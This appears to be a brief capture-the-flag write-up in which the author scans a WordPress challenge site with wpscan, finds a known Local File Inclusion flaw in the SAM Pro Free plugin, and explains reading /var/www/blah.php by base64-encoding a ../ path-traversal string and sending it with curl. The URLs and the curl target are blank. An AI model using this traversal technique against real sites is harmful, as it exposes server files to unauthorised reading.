What the LFI ?

So we got a website : and we need to get /var/www/blah.php file. Given the title, we know we need to find some LFI.


This is a wordpress site, so just run wpscan, and after a few seconds :

[+] Enumerating plugins from passive detection ...
 | 1 plugin found:

[+] Name: sam-pro-free - v1.8.2.51
 |  Last updated: 2017-06-19T15:42:00.000Z
 |  Location:
 |  Readme:
[!] The version is out of date, the latest version is

[!] Title: SAM Pro (Free Edition) <= - Local File Inclusion (LFI)
    Reference: https://wpvulndb.com/vulnerabilities/8647
    Reference: https://www.pluginvulnerabilities.com/2016/10/28/local-file-inclusion-lfi-vulnerability-in-sam-pro-free-edition/
    Reference: https://plugins.trac.wordpress.org/changeset/1526624/sam-pro-free
[i] Fixed in:


Just find the exploit from documentation, then base64 encode your path (../../../../../../../var/www/blah.php) and:

$ curl ''